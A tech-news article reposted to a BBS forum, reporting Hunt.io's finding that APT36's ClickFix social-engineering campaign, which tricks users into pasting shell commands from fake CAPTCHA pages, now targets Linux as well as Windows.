1. Forum
  2. tqwNet
  3. TQW GENTECH

  • New ClickFix campaign spotted hitting both Windows and Linux mach

    From TechnologyDaily@1337:1/100 to All on Tuesday, May 13, 2025 13:45:07
    New ClickFix campaign spotted hitting both Windows and Linux machines

    Date:
    Tue, 13 May 2025 12:30:00 +0000

    Description:
    ClickFix is evolving once again and this time, it's targeting Linux, too.

    FULL STORY ======================================================================Research ers from Hunt.io saw a Linux-based ClickFix attack At the moment, it is still harmless The researchers believe a Pakistani threat actor is behind the attacks

    ClickFix, a type of attack that tricks people into running console commands
    to download malware , thinking theyre fixing a problem, is evolving once again.

    This time, cybersecurity researchers from Hunt.io said they spotted the
    attack targeting Linux devices, as well.

    Originally, ClickFix was designed for Windows devices but has, at some point, expanded into macOS, as well. Linux was, for the most part, spared. Until
    now.

    TechRadar Pro readers can get 60% off Premium Plans at RoboForm now!

    New users can take advantage of RoboForms exclusive deal and get 60% off the Premium Plan. With this deal, you can get unlimited password storage, one-click login & autofill, password sharing, two-factor authentication for added protection, cloud backup, and emergency access for trusted contacts. To claim this deal, visit this link and sign up for the Premium Plan to lock in this huge discount.

    Preferred partner ( What does this mean? ) View Deal ClickFix strikes Linux

    ClickFix works in a simple way - a website is compromised and used to show a popup. That popup usually tells the visitor that they need to update their browser to view the content, or pass a CAPTCHA test to confirm that theyre human.

    That update or verification process requires the user to copy a command to
    the clipboard, bring up the Run program (on Windows), paste and run it. It
    may sound like a stretch, but its relatively successful, since many cybersecurity companies have been warning about new ClickFix campaigns emerging left and right.

    Hunt.io has attributed this newest string of attacks to a Pakistani threat actor called APT36, or Transparent Tribe. It uses a fake Ministry of Defense of India website, containing a link to a fake press release. When a victim tries to navigate to the press release, the site analyzes their OS, and then redirects them to the corresponding attack flow.

    For Linux, the victims are redirected to a CAPTCHA page that copies a shell command when they click the Im not a robot button. They are then asked to press ALT+F2 to bring up the Linux run dialog, and paste and run the command.

    The good news is that the attack was spotted while still in experimental phase, meaning it hasnt caused any significant damage, yet. Apparently, all the shell command does is download a harmless JPEG file. Things could turn sour at any point, however.

    "No additional activity, such as persistence mechanisms, lateral movement, or outbound communication, was observed during execution," the researchers explained.

    Via BleepingComputer You might also like US deportation airline GlobalX website defaced by hackers, data stolen Take a look at our guide to the best authenticator app We've rounded up the best password managers



    ======================================================================
    Link to news story: https://www.techradar.com/pro/security/new-clickfix-campaign-spotted-hitting-b oth-windows-and-linux-machines


    --- Mystic BBS v1.12 A47 (Linux/64)
    * Origin: tqwNet Technology News (1337:1/100)